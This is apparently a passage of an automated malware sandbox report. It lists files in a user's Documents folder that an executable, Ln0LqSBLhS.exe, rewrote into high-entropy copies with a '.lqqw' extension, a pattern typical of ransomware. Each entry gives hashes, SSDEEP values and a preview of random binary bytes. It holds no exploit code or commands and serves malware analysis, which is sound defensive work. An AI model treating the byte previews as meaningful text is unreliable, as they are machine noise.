                                                                                                                                                                                                    SHA-256:74F535DA0D49F7D24BCEF9881125B2CEA15E95EA10EEDE8A2A9C5BE53FAE7319
                                                                                                                                                                                                    SHA-512:231E6D7F79F7EF9C3F4F303DAA6E0AD343D2DB441851910084F27CA2DF6D8C838DA974BD40428EF14F7C272CB3A3091D246AAB653CFB30DF24EEFA906CDEE0AE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Gu.1(...KB...9....?R._V.L...$...E..*I>|..X. .y7.......^1CoF...C.`...0..J.w...(.s.K.".%..R.P.F.VuK:...X.R..*o..$.Z+.%....JA*.f..w.P.vj......r....|..e....v...p..l.....ZkK..S....L.../..[..Sc..q.#[G.X....5......%X/u.R.k.-...~.A%........p..]Q.Q..,.7a.G.s.q....{.D.Y4.JD.+,.VKh..z)Z`w.r.;._9.t^i.'.~....m..f...T.g.."5%...;....Iuw^..5N.N.;2....&...........}.Kc@X.....QF.a...S)?=2..mSL.9{..[.s.6t.Z...W......!...5.u\.r.-.1}aa.....-.7......:......0.).<..z.k..#....n...A.x.%@..Et....F5.."....X..Rr .U.Y.N$.,.U/3....WN..z._.5]..M.$V.{'X.,.a.X.`......\9.....G34l........*u..a:<..&S...S.]>...q....\5c.=M...);w.<....|.0........)....Y...z....7.L..P. ...{=.1..).........c..Q.@........X.~a."Q.....:.?..} TbU..U0i...R;.....p.....|..:5.G#...Bwi_...a-..$.m............/.I..M..v.../......P>.o|TN...[.......1`...:...(.T"....c._...F.._..0!..(./`..?.x...@=X. k...c..nq..$.(.....%.....+.....l...0pZ.S}.Qs....Sv`...i.v....D..bQ$..=.._.'&s..X......$~y..DKI.u3...P...2.a....aV.yk
                                                                                                                                                                                                    C:\Users\user\Documents\DUUDTUBZFW.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842995785559609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:D8DYySAyRFZbs//BNLehV6+Z03hRRnlANSjfAwpiZvq7IhXBa482McBj7bD:D8DYy3oHY3nZRRlANSrXQBq7IhRMcpD
                                                                                                                                                                                                    MD5:056EE503C8B94028C3FDABD5DF0CB39C
                                                                                                                                                                                                    SHA1:31D92CC49B0F6E994BC53D9F98D68C6A6FA9CA74
                                                                                                                                                                                                    SHA-256:74F535DA0D49F7D24BCEF9881125B2CEA15E95EA10EEDE8A2A9C5BE53FAE7319
                                                                                                                                                                                                    SHA-512:231E6D7F79F7EF9C3F4F303DAA6E0AD343D2DB441851910084F27CA2DF6D8C838DA974BD40428EF14F7C272CB3A3091D246AAB653CFB30DF24EEFA906CDEE0AE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Gu.1(...KB...9....?R._V.L...$...E..*I>|..X. .y7.......^1CoF...C.`...0..J.w...(.s.K.".%..R.P.F.VuK:...X.R..*o..$.Z+.%....JA*.f..w.P.vj......r....|..e....v...p..l.....ZkK..S....L.../..[..Sc..q.#[G.X....5......%X/u.R.k.-...~.A%........p..]Q.Q..,.7a.G.s.q....{.D.Y4.JD.+,.VKh..z)Z`w.r.;._9.t^i.'.~....m..f...T.g.."5%...;....Iuw^..5N.N.;2....&...........}.Kc@X.....QF.a...S)?=2..mSL.9{..[.s.6t.Z...W......!...5.u\.r.-.1}aa.....-.7......:......0.).<..z.k..#....n...A.x.%@..Et....F5.."....X..Rr .U.Y.N$.,.U/3....WN..z._.5]..M.$V.{'X.,.a.X.`......\9.....G34l........*u..a:<..&S...S.]>...q....\5c.=M...);w.<....|.0........)....Y...z....7.L..P. ...{=.1..).........c..Q.@........X.~a."Q.....:.?..} TbU..U0i...R;.....p.....|..:5.G#...Bwi_...a-..$.m............/.I..M..v.../......P>.o|TN...[.......1`...:...(.T"....c._...F.._..0!..(./`..?.x...@=X. k...c..nq..$.(.....%.....+.....l...0pZ.S}.Qs....Sv`...i.v....D..bQ$..=.._.'&s..X......$~y..DKI.u3...P...2.a....aV.yk
                                                                                                                                                                                                    C:\Users\user\Documents\EIVQSAOTAQ.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.849362407195742
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:HGutgkV4dVqR9vmVkyBP9NXtQjhPchAP2fiRmHbfsz/wbD:mNX7keVkSDGhPKKmHbfmCD
                                                                                                                                                                                                    MD5:C6FCDC874FED0D4074007163A47CCA12
                                                                                                                                                                                                    SHA1:FEEBFAF109A5860F6294CB9261A344E8D0A27388
                                                                                                                                                                                                    SHA-256:EF5676194342EBF2B86229FE47294EB173ABD60296E807A48EE030A40764A32A
                                                                                                                                                                                                    SHA-512:F83865BAFA3E6DEF69825A00742279F57602423974A9B0668908F67B26BC62AECD8C9846E7DD4E92E2C5357940219F9346B03C1D2F339D99E72BEB80D2214202
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: wJ.v...g....s......i{...:t.!.Dy(|.X..R...2.).......'...34w.q... Lxs.p...Z.....2..fg.v. .;."0.....p...5......[........DD....06......'K.t....i.+...w.l...D1,....3C..P.pc...tKl.?.u2.o.-sB../..@9.a-.B.>.v.........~-+..._;.'.n....rsiG.`p..&7|.j7sa.jc....<...e..]o..M.9...b._..h....q..}J.Z6.~.^...l..>.5.....(.....]...AK..r`}....u.....Tdc.....6.)[&d......2........B..mc"{.........'z..h'.G9.[.$..8A....RW>fi.........C7.4i..L$...<..JW."....c.&..~<...Q...#k.!| ../.'...0,.m.......C[..N....W:...Z.o..}.w?..1Jf..]..A}@..N.#...8.....j/+..T.....5...$T.!.&.+1.7@ci....k.i6...M+..EI,..?.X.f.bK...9R.]..=x#..0.&.e..p>.>......i...l...k.........=...U.q........Wh.sF7..V...l&.9y..5.;as,h.._4T.p-.Qvq.P........R...@3.........r...A..UU........Gs...C..i.F...$S.q..}II...=..2y.Z.1...,.1;..._.x...=......!.]..l[.D..*...[...v....<..J8..5.l..k..... Y..6....[.f.....a...........(..G.;~.o...Z.+..,.................&.7..(.%..w1D.i..}.........-.6.o....]j.t.........".s.......HDC....s...r<.k.z.y$.R2
                                                                                                                                                                                                    C:\Users\user\Documents\EIVQSAOTAQ.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.849362407195742
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:HGutgkV4dVqR9vmVkyBP9NXtQjhPchAP2fiRmHbfsz/wbD:mNX7keVkSDGhPKKmHbfmCD
                                                                                                                                                                                                    MD5:C6FCDC874FED0D4074007163A47CCA12
                                                                                                                                                                                                    SHA1:FEEBFAF109A5860F6294CB9261A344E8D0A27388
                                                                                                                                                                                                    SHA-256:EF5676194342EBF2B86229FE47294EB173ABD60296E807A48EE030A40764A32A
                                                                                                                                                                                                    SHA-512:F83865BAFA3E6DEF69825A00742279F57602423974A9B0668908F67B26BC62AECD8C9846E7DD4E92E2C5357940219F9346B03C1D2F339D99E72BEB80D2214202
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: wJ.v...g....s......i{...:t.!.Dy(|.X..R...2.).......'...34w.q... Lxs.p...Z.....2..fg.v. .;."0.....p...5......[........DD....06......'K.t....i.+...w.l...D1,....3C..P.pc...tKl.?.u2.o.-sB../..@9.a-.B.>.v.........~-+..._;.'.n....rsiG.`p..&7|.j7sa.jc....<...e..]o..M.9...b._..h....q..}J.Z6.~.^...l..>.5.....(.....]...AK..r`}....u.....Tdc.....6.)[&d......2........B..mc"{.........'z..h'.G9.[.$..8A....RW>fi.........C7.4i..L$...<..JW."....c.&..~<...Q...#k.!| ../.'...0,.m.......C[..N....W:...Z.o..}.w?..1Jf..]..A}@..N.#...8.....j/+..T.....5...$T.!.&.+1.7@ci....k.i6...M+..EI,..?.X.f.bK...9R.]..=x#..0.&.e..p>.>......i...l...k.........=...U.q........Wh.sF7..V...l&.9y..5.;as,h.._4T.p-.Qvq.P........R...@3.........r...A..UU........Gs...C..i.F...$S.q..}II...=..2y.Z.1...,.1;..._.x...=......!.]..l[.D..*...[...v....<..J8..5.l..k..... Y..6....[.f.....a...........(..G.;~.o...Z.+..,.................&.7..(.%..w1D.i..}.........-.6.o....]j.t.........".s.......HDC....s...r<.k.z.y$.R2
                                                                                                                                                                                                    C:\Users\user\Documents\EIVQSAOTAQ.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.84796243237142
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:cg+f0Y4MoB2EMExCjqNODFbkwiPy8Jqg/kT8iBerjSfiQi+kOpqIfg3yXbD:cfFEMExCGNCPEy8JNO8BjZtOpzZrD
                                                                                                                                                                                                    MD5:3AEA46DF4133DA233A94DB62BFBB53DC
                                                                                                                                                                                                    SHA1:6C07E66F9B5BDA5EFE004622D90538B9C60FC591
                                                                                                                                                                                                    SHA-256:ED725F3C3E886759B944A08E3C01DCE6D787886B9333F4F9458AABD5E2A0DB6E
                                                                                                                                                                                                    SHA-512:0DF4E851F0DDAE570290FB1E14051F86B7BE36478FD4408DC675F958D2F5EBCF41B59BFD9B32FBC48EDAED85DB65163D72C015B9D53743314A51AC8DF18167E1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: {...0....tJR.......... ..nsV.i.(.y.....9.'..]c.P%..r.)AqP2...E.cf...bn.~...|sY..F|V.a.U...]tz.._.....q.2.!zP.N...[X/e.{.+..k5...b0..R$...x.^.U..u..rk.Sy..4.Su..^..-.Wt0y/..._\..;_.G.Y..8c=...'rT#.3c.@z......2a.0...)..J.0}.n ..b.......q../.A./%..:.ps...Xo.l..N$0..7..".H..h...;..h.Ti...`.nk.....Ct.ky...6..x.i...,.1P^L.......k...&.r6)N7.|&;..5.O.wt...Z.*...A...A..m.WE..e.....4.4P.R.@....^...y.Y..sM.{G...e.......yEp...|...s..y..g.oSJ.:.....bG..f.M..)..a...sN.n%`~..T*..7.t6..F>+.r!..~CAS3.YD;.!.v.;??......Rb..g.s.I...*..I...;.4sJ..;H.d.og.PH..^......m.'s...pN.9......}.g....8+5..ZG.h.a..C..<_u.....1.].>*Sf......I...n.~.......nY.c......k.F.r.e.9.syV.u..R.q....'.h|.......AE.kD.(..X..N|...7).......ZpD......2f..........+.R..t._.GDTK.T...l/)...-[..).J\c(...zo.q.7~.=...%%Xd..c...g...h...Ed............=.x.W..^v....`.....=!....~.h..=N.2..T..5$f.o.)~.I......Jb........K..E.@+..s........0...d..{%...s.>U.H...Y..I......[..z.......w..~:1AiP....;f......ty.A.S
                                                                                                                                                                                                    C:\Users\user\Documents\EIVQSAOTAQ.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.84796243237142
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:cg+f0Y4MoB2EMExCjqNODFbkwiPy8Jqg/kT8iBerjSfiQi+kOpqIfg3yXbD:cfFEMExCGNCPEy8JNO8BjZtOpzZrD
                                                                                                                                                                                                    MD5:3AEA46DF4133DA233A94DB62BFBB53DC
                                                                                                                                                                                                    SHA1:6C07E66F9B5BDA5EFE004622D90538B9C60FC591
                                                                                                                                                                                                    SHA-256:ED725F3C3E886759B944A08E3C01DCE6D787886B9333F4F9458AABD5E2A0DB6E
                                                                                                                                                                                                    SHA-512:0DF4E851F0DDAE570290FB1E14051F86B7BE36478FD4408DC675F958D2F5EBCF41B59BFD9B32FBC48EDAED85DB65163D72C015B9D53743314A51AC8DF18167E1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: {...0....tJR.......... ..nsV.i.(.y.....9.'..]c.P%..r.)AqP2...E.cf...bn.~...|sY..F|V.a.U...]tz.._.....q.2.!zP.N...[X/e.{.+..k5...b0..R$...x.^.U..u..rk.Sy..4.Su..^..-.Wt0y/..._\..;_.G.Y..8c=...'rT#.3c.@z......2a.0...)..J.0}.n ..b.......q../.A./%..:.ps...Xo.l..N$0..7..".H..h...;..h.Ti...`.nk.....Ct.ky...6..x.i...,.1P^L.......k...&.r6)N7.|&;..5.O.wt...Z.*...A...A..m.WE..e.....4.4P.R.@....^...y.Y..sM.{G...e.......yEp...|...s..y..g.oSJ.:.....bG..f.M..)..a...sN.n%`~..T*..7.t6..F>+.r!..~CAS3.YD;.!.v.;??......Rb..g.s.I...*..I...;.4sJ..;H.d.og.PH..^......m.'s...pN.9......}.g....8+5..ZG.h.a..C..<_u.....1.].>*Sf......I...n.~.......nY.c......k.F.r.e.9.syV.u..R.q....'.h|.......AE.kD.(..X..N|...7).......ZpD......2f..........+.R..t._.GDTK.T...l/)...-[..).J\c(...zo.q.7~.=...%%Xd..c...g...h...Ed............=.x.W..^v....`.....=!....~.h..=N.2..T..5$f.o.)~.I......Jb........K..E.@+..s........0...d..{%...s.>U.H...Y..I......[..z.......w..~:1AiP....;f......ty.A.S
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.84051725063993
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:4KoOeune4jmcWJFCoowUTLoSmdeyYBOb7Ijhjx27UZeKt/5XbD:HLne4j7MFCoi3mdeykObUjXHBD
                                                                                                                                                                                                    MD5:5BA4B86E13FD3DA351BE93985019D2FE
                                                                                                                                                                                                    SHA1:D6B5B8B6906065008F9D2BD9EE24346D9599A3B4
                                                                                                                                                                                                    SHA-256:CA6B6242CDC66E12EC900676D9225FFC62DA645CE7F51FD6551B1317B9DB42B6
                                                                                                                                                                                                    SHA-512:16E3AC34215658C164CA8AE1FCD41DA7D8B0F5048B5FF683F7D6180E26F72CD2B248E01A1115AB9C4EF4C9159D8E920A2A3EEEAF83051D88FE9289D88092251B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: L....c.......E.?..s.......L.:D:|Sjt;ZY..t...X.....S,1.....\.@..~.F8UzyCl$.0{...>..VM.J.8.T.g.rW..._.........8y...Q..*^....nUz...4.%....0_.k....,.v.(.X..o.....{0....7.Zl..5,..hOZ6.N...n.<..-.Kl..~.`......aA....+j.....9.....U...PN.P..M.E...B...t:..6......y....~K.,....D..^.L.y.....){.d..uN......@....;.J.<.s!..F....n...RJ../X..j...P.6........... E..W..F..M.z..Q...'R.3.{<T..\(Ni...L....-..$.=.=........$Q......h......I...9..B_j...h......x..0...s\..v........[..z..g.>.....D..i.Q.5h..j...h.l........B6K.....i(J.~./..E..%&Cs)Z[..........'...4= ....8.b}...b..%S..$.f.p...t....].......;.|95$W..N.6....Sv...[j......J|.XXZY"...i^k6...;....U./........J.\..u..i......+/...3.'B....@.j...G.[kF.'..`.,Z.2uX..a....t9.f.....B...5B.....#.k.2(i.8>..c.h.4....-C...2...t....q.Q@..$....d4./..7o..pQ.;n.._....|~<....?|.....7.7d.....o.Y..Y&........#.#...iL...$.d:......J8..+..3..c...o..(7.T.lX..6..:...J..t&.85@.($.\AM.=F..... M.w...ts.,..FO....z.Q.exW.$..;2...9.^.Q%....
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.84051725063993
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:4KoOeune4jmcWJFCoowUTLoSmdeyYBOb7Ijhjx27UZeKt/5XbD:HLne4j7MFCoi3mdeykObUjXHBD
                                                                                                                                                                                                    MD5:5BA4B86E13FD3DA351BE93985019D2FE
                                                                                                                                                                                                    SHA1:D6B5B8B6906065008F9D2BD9EE24346D9599A3B4
                                                                                                                                                                                                    SHA-256:CA6B6242CDC66E12EC900676D9225FFC62DA645CE7F51FD6551B1317B9DB42B6
                                                                                                                                                                                                    SHA-512:16E3AC34215658C164CA8AE1FCD41DA7D8B0F5048B5FF683F7D6180E26F72CD2B248E01A1115AB9C4EF4C9159D8E920A2A3EEEAF83051D88FE9289D88092251B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: L....c.......E.?..s.......L.:D:|Sjt;ZY..t...X.....S,1.....\.@..~.F8UzyCl$.0{...>..VM.J.8.T.g.rW..._.........8y...Q..*^....nUz...4.%....0_.k....,.v.(.X..o.....{0....7.Zl..5,..hOZ6.N...n.<..-.Kl..~.`......aA....+j.....9.....U...PN.P..M.E...B...t:..6......y....~K.,....D..^.L.y.....){.d..uN......@....;.J.<.s!..F....n...RJ../X..j...P.6........... E..W..F..M.z..Q...'R.3.{<T..\(Ni...L....-..$.=.=........$Q......h......I...9..B_j...h......x..0...s\..v........[..z..g.>.....D..i.Q.5h..j...h.l........B6K.....i(J.~./..E..%&Cs)Z[..........'...4= ....8.b}...b..%S..$.f.p...t....].......;.|95$W..N.6....Sv...[j......J|.XXZY"...i^k6...;....U./........J.\..u..i......+/...3.'B....@.j...G.[kF.'..`.,Z.2uX..a....t9.f.....B...5B.....#.k.2(i.8>..c.h.4....-C...2...t....q.Q@..$....d4./..7o..pQ.;n.._....|~<....?|.....7.7d.....o.Y..Y&........#.#...iL...$.d:......J8..+..3..c...o..(7.T.lX..6..:...J..t&.85@.($.\AM.=F..... M.w...ts.,..FO....z.Q.exW.$..;2...9.^.Q%....
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.848098706706143
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:wLcV32Cu7Gs5qgYkAAb60W0HLP2vtf/9LHHvm9Hn/RJ429ab7no1ngMA99vhUaIX:/2gvJgrM95HHvEHn/Ri2kb7nUngMAHoX
                                                                                                                                                                                                    MD5:5348561A38E70FBE78120D2F1A9A3FCA
                                                                                                                                                                                                    SHA1:6846FF07984709A190E5DFB8662788140DA1F8C7
                                                                                                                                                                                                    SHA-256:287D22EF52FBAA523E3B9E9169F32B37CC2F058B80CF8617E921FA76853D481D
                                                                                                                                                                                                    SHA-512:3111297E09788ADC6B18E5A17EBD17B04FDF4A4DFEF97B2CE2121906CA56BE05D9D377BE14DBED1CFF39CEB045177A42E866AF46F2A438F48D47C433B2F1F9C4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $.y.7tG.,x....^...7...w..<q.i..1.6./.g6.dBq.K.-.%2.,....Q..A.U\.i."1.[^FC....3{.Qm.U.....r.8..+..a.i.......8..t.....bP...n#!>ft....?.'A..>y.-..I...%..\..$....U.}s..7.....s6.Aa.89.F.I=........d...1.<:.....[........l.....1.......'.0.,O}}(....b.c.fE.<$"...G(...AM`R. As:..a/...F...&.q..6..gE..f.)Q..%.@....'..s...r.......~..?4.Ng-..%.jp.+......v..(.))...q..N..z.<....{...B...M..5...x...P_..+....[x.R3....5.R..<....[.E/+...|=..G8....%..N~...QfT.b...[.........5.).S..9..6_.H........"M..I-4*.........v...Ludk"....%..Q#...m.u....9..>O.'|...2..y.....Mx ..3....~.....?=..[.3.....N.e......G....{7..\....^A....D$.h...@...lw..k...{..!l.M.1.#...Ov...9P.$-Z.|P..H..P.8.C...w..vU..G.4.vs.'.Z.9F]....;...Z.I)+...NU.!.....K..+..._A....+.YQ..bqv.u..j..T..yK.W......[.).."...6...!..yP....T.vbL.%.yA...$....8).i`..ldE..".h...!....y.&h..9..*.X.....S.......{.R..........1'...H......I5%.L..M.t.....F`{..~..;....?M..g.gDZ../.v}e...A.!.I>.S..<x5Q..)h.*..iW...+.3.I
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.848098706706143
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:wLcV32Cu7Gs5qgYkAAb60W0HLP2vtf/9LHHvm9Hn/RJ429ab7no1ngMA99vhUaIX:/2gvJgrM95HHvEHn/Ri2kb7nUngMAHoX
                                                                                                                                                                                                    MD5:5348561A38E70FBE78120D2F1A9A3FCA
                                                                                                                                                                                                    SHA1:6846FF07984709A190E5DFB8662788140DA1F8C7
                                                                                                                                                                                                    SHA-256:287D22EF52FBAA523E3B9E9169F32B37CC2F058B80CF8617E921FA76853D481D
                                                                                                                                                                                                    SHA-512:3111297E09788ADC6B18E5A17EBD17B04FDF4A4DFEF97B2CE2121906CA56BE05D9D377BE14DBED1CFF39CEB045177A42E866AF46F2A438F48D47C433B2F1F9C4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $.y.7tG.,x....^...7...w..<q.i..1.6./.g6.dBq.K.-.%2.,....Q..A.U\.i."1.[^FC....3{.Qm.U.....r.8..+..a.i.......8..t.....bP...n#!>ft....?.'A..>y.-..I...%..\..$....U.}s..7.....s6.Aa.89.F.I=........d...1.<:.....[........l.....1.......'.0.,O}}(....b.c.fE.<$"...G(...AM`R. As:..a/...F...&.q..6..gE..f.)Q..%.@....'..s...r.......~..?4.Ng-..%.jp.+......v..(.))...q..N..z.<....{...B...M..5...x...P_..+....[x.R3....5.R..<....[.E/+...|=..G8....%..N~...QfT.b...[.........5.).S..9..6_.H........"M..I-4*.........v...Ludk"....%..Q#...m.u....9..>O.'|...2..y.....Mx ..3....~.....?=..[.3.....N.e......G....{7..\....^A....D$.h...@...lw..k...{..!l.M.1.#...Ov...9P.$-Z.|P..H..P.8.C...w..vU..G.4.vs.'.Z.9F]....;...Z.I)+...NU.!.....K..+..._A....+.YQ..bqv.u..j..T..yK.W......[.).."...6...!..yP....T.vbL.%.yA...$....8).i`..ldE..".h...!....y.&h..9..*.X.....S.......{.R..........1'...H......I5%.L..M.t.....F`{..~..;....?M..g.gDZ../.v}e...A.!.I>.S..<x5Q..)h.*..iW...+.3.I
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.840681297740019
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:SmonWgXnL05XCyg5Jm0snGJJXTKY8yQ38C71WYrFFbeI6a34h7GM/ubD:enWgXL0Syg5M0UGJ5vQL713rFF6s8mD
                                                                                                                                                                                                    MD5:A8DE8EB11EE9FB0304BB8073B6E19AA2
                                                                                                                                                                                                    SHA1:A1B1F61838FD71D0E99CE5917767224972B0FB5B
                                                                                                                                                                                                    SHA-256:EB5AC43491F11287EF67946CA5563434C444DC34DE30F0FCB0684A5B72680AC7
                                                                                                                                                                                                    SHA-512:B756A6AB47169EFF10FF997E3E4DC7A60E9C334FE649A4D849502E2332FB8769138D7E81CD2DBACE0D5613678AE1725C55CE8805C61AF41C2769FC813A3B7164
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: >C.Y..]m.. ...b.`}.. $i....oqL..!.m...w..*.Y9.U..7.....h....d.."X.g....I0..3......F.S..... E\.M.f...V..fw.M....qSYE. |.4..?q.S...,..Kz.8....Q...v.........O.g...:T!.e.1..f.Sf...|y.A....=.}.....m$..A....(...{`).-'J..$..{.....3.~&.Z..&9O........2!...R.1.~...f.@`qw.c.t.JC..\.h.#|m?.yP..6..4.c{..|..}......n.elP..........S.....:....G.G.E.+>.,...!..o.j.........;9..GG>0.....R...a../(..n...*...5.1F.1.#...^u.p.5.,e{n{P2..m.-.o....Ol..B`..LZ.a.....(Xr|%.&R.~.fH.tX..3..0.B.y..D.{7)*..wX..&.P.JD..P.c...Ti.`."p.~.\.....J...a.DqB.*W+.^-.....I.-.!.dP?.D....0.....H,z...D3E.....hf.HpG.`u..&...(_.E......h...H..OK..mL.L..'... A,E..xzD.mY.wM.IO..$..........t.U...m3..K.:)!.....<..S.I.1..i..y..#...i........!..^........@E3..9<.US..h0.U.1...EX..7.Q.N..q2..{.gL.E-.(.Mn...=.d..$.}.u%...../.H@.{..t...9ui....|.#..|).[.t.S3@..........r."c..'....3,.|...8..}7.'"...v.../"....4.4.....p.....$..Z....PP.HD$.Q..?..;....p..'..k.i...f.r.)/~.kB.(....F...x..1..-......&d......{...3n.l.z.
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.840681297740019
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:SmonWgXnL05XCyg5Jm0snGJJXTKY8yQ38C71WYrFFbeI6a34h7GM/ubD:enWgXL0Syg5M0UGJ5vQL713rFF6s8mD
                                                                                                                                                                                                    MD5:A8DE8EB11EE9FB0304BB8073B6E19AA2
                                                                                                                                                                                                    SHA1:A1B1F61838FD71D0E99CE5917767224972B0FB5B
                                                                                                                                                                                                    SHA-256:EB5AC43491F11287EF67946CA5563434C444DC34DE30F0FCB0684A5B72680AC7
                                                                                                                                                                                                    SHA-512:B756A6AB47169EFF10FF997E3E4DC7A60E9C334FE649A4D849502E2332FB8769138D7E81CD2DBACE0D5613678AE1725C55CE8805C61AF41C2769FC813A3B7164
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: >C.Y..]m.. ...b.`}.. $i....oqL..!.m...w..*.Y9.U..7.....h....d.."X.g....I0..3......F.S..... E\.M.f...V..fw.M....qSYE. |.4..?q.S...,..Kz.8....Q...v.........O.g...:T!.e.1..f.Sf...|y.A....=.}.....m$..A....(...{`).-'J..$..{.....3.~&.Z..&9O........2!...R.1.~...f.@`qw.c.t.JC..\.h.#|m?.yP..6..4.c{..|..}......n.elP..........S.....:....G.G.E.+>.,...!..o.j.........;9..GG>0.....R...a../(..n...*...5.1F.1.#...^u.p.5.,e{n{P2..m.-.o....Ol..B`..LZ.a.....(Xr|%.&R.~.fH.tX..3..0.B.y..D.{7)*..wX..&.P.JD..P.c...Ti.`."p.~.\.....J...a.DqB.*W+.^-.....I.-.!.dP?.D....0.....H,z...D3E.....hf.HpG.`u..&...(_.E......h...H..OK..mL.L..'... A,E..xzD.mY.wM.IO..$..........t.U...m3..K.:)!.....<..S.I.1..i..y..#...i........!..^........@E3..9<.US..h0.U.1...EX..7.Q.N..q2..{.gL.E-.(.Mn...=.d..$.}.u%...../.H@.{..t...9ui....|.#..|).[.t.S3@..........r."c..'....3,.|...8..}7.'"...v.../"....4.4.....p.....$..Z....PP.HD$.Q..?..;....p..'..k.i...f.r.)/~.kB.(....F...x..1..-......&d......{...3n.l.z.
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\CZQKSDDMWR.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.844384093216815
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:XZvZn1CUQdGhr0QT8MTNw1/+b8qnusQJ4Idsd/wBVJYYSh8yn4e9IbX2QwyGbD:9FcdGh4a8C+V+b8WusQ/dsd/yejn19I4
